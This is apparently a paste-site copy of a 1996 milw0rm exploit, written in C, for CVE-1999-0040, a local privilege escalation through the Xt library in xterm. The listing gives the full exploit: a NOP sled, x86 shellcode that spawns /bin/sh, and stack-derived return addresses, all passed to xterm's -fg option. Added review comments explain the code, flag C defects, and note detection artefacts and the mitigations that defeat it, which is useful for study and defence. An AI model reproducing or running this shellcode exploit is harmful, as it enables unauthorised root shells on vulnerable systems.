FlyFar

Xt Library - Local Privilege Escalation - CVE-1999-0040

Feb 25th, 2024
C 1.37 KB | Cybersecurity | 0 0
  1. #include
  2. #include
  3. #include
  4.  
  /* Default for `ofs` in main(): the value added to get_esp()'s result.
   * argv[1] replaces it when present. */
  5. #define DEFAULT_OFFSET          0
  /* Default for `bs` in main(): the byte offset inside the heap buffer at which
   * the execshell bytes end and the repeated address words begin.
   * argv[2] replaces it when present. main() allocates a fixed 4096 bytes and
   * never compares bs against that size. */
  6. #define BUFFER_SIZE             1491
  7.  
  /*
   * get_esp - copy the current stack pointer (%esp) into %eax.
   *
   * The function is declared to return long but has no return statement; the
   * callers in main() use the result anyway. Using the value of a non-void
   * function that falls off its end is undefined behaviour in C, so this only
   * "works" when the compiler leaves %eax untouched between the asm statement
   * and the function epilogue.
   *
   * The register names are 32-bit x86 (AT&T syntax), so the listing is tied to
   * that architecture.
   */
  8. long get_esp(void)
  9. {
         /* Basic asm with no output operand and no clobber list: the compiler is
          * not told that %eax is written. */
  10.    __asm__("movl %esp,%eax\n");
  11. }
  12.  
  /*
   * main - build one long NUL-terminated string on the heap and hand it to
   * /usr/X11R6/bin/xterm as the value of its "-fg" option.
   *
   * Arguments (both optional, both parsed with atoi() and not validated):
   *   argv[1]  replaces DEFAULT_OFFSET (ofs)
   *   argv[2]  replaces BUFFER_SIZE (bs)
   *
   * Layout written into buff, in order:
   *   (bs - strlen(execshell)) bytes of 0x90,
   *   the execshell bytes,
   *   (8/4) = 2 unsigned long words holding get_esp() + ofs,
   *   one terminating 0 byte.
   *
   * NOTE(review): the page title attributes the flaw to the Xt library
   * (CVE-1999-0040); the vulnerable code itself is not on this page.
   * Presumably this matters only where xterm runs with elevated privileges -
   * confirm against the advisory.
   * NOTE(review): for detection, the visible artefact is an xterm process
   * whose -fg value is roughly 1.5 KB and mostly 0x90 bytes instead of a
   * colour name; process-execution auditing that records arguments can flag
   * it.
   * NOTE(review): the address words are derived from this process's own
   * stack pointer, so the listing appears to assume a predictable stack
   * layout in the launched program; stack address randomisation and a
   * non-executable stack would be expected to break that - confirm.
   *
   * No return type is declared (implicit int, removed in C99) and no value is
   * returned.
   */
  13. main(int argc, char **argv)
  14. {
  15.    char *buff = NULL;
  16.    unsigned long *addr_ptr = NULL;
  17.    char *ptr = NULL;
  18.  
         /* Opaque byte string, presumably x86 machine code (not decoded here); it
          * embeds the literal "/bin/sh". strlen() is applied to it below, so its
          * length is taken up to the first zero byte. */
  19.    char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
  20.    "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
  21.    "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
  22. "\xeb\x18"
  23.    "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
  24.    "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";
  25.  
  26.    int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;
  27.  
         /* atoi() reports no errors: non-numeric input yields 0 and negative
          * values are accepted as-is. */
  28.    if(argc>1)
  29.         ofs=atoi(argv[1]);
  30.    if(argc>2)
  31.         bs=atoi(argv[2]);
         /* get_esp()+ofs has type long but is printed with %x, which expects
          * unsigned int - a format/argument mismatch. */
  32.    printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
  33.         ofs, get_esp()+ofs, bs);
  34.  
         /* Fixed 4096-byte allocation; bs is caller-controlled and is never
          * checked against this size. */
  35.    buff = malloc(4096);
  36.    if(!buff)
  37.    {
  38.       printf("can't allocate memory\n");
            /* Exits with status 0 even though allocation failed. */
  39.       exit(0);
  40.    }
  41.    ptr = buff;
         /* Fill the front of the buffer with 0x90 bytes. If bs is smaller than
          * strlen(execshell) the size_t subtraction wraps to a huge count; if bs
          * plus the trailing words and terminator exceeds 4096 the writes below run
          * past the allocation. */
  42.    memset(ptr, 0x90, bs-strlen(execshell));
  43.    ptr += bs-strlen(execshell);
         /* Byte-by-byte copy of execshell; int i is compared with the size_t
          * result of strlen(), which is re-evaluated every iteration. */
  44.    for(i=0;i < strlen(execshell);i++)
  45.       *(ptr++) = execshell[i];
         /* ptr now sits at offset bs in buff (1491 by default, not a multiple of
          * 4), so the word stores below are misaligned in C terms; the cast is to
          * long * while addr_ptr is unsigned long *. */
  46.    addr_ptr = (long *)ptr;
         /* Two iterations; each store is sizeof(unsigned long) bytes, so the
          * "8/4" presumably assumes a 4-byte long. */
  47.    for(i=0;i < (8/4);i++)
  48.       *(addr_ptr++) = get_esp() + ofs;
  49.    ptr = (char *)addr_ptr;
         /* Terminate so the buffer can be passed as a C string argument. */
  50.    *ptr = 0;
         /* Replaces this process with xterm, passing buff as the -fg value. The
          * return value is not checked, so a failed exec falls off the end of
          * main(); the sentinel is a bare NULL rather than (char *)NULL. */
  51.    execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
  52. }
  53.  
  54.  
  55. // milw0rm.com [1996-08-24]
  56.            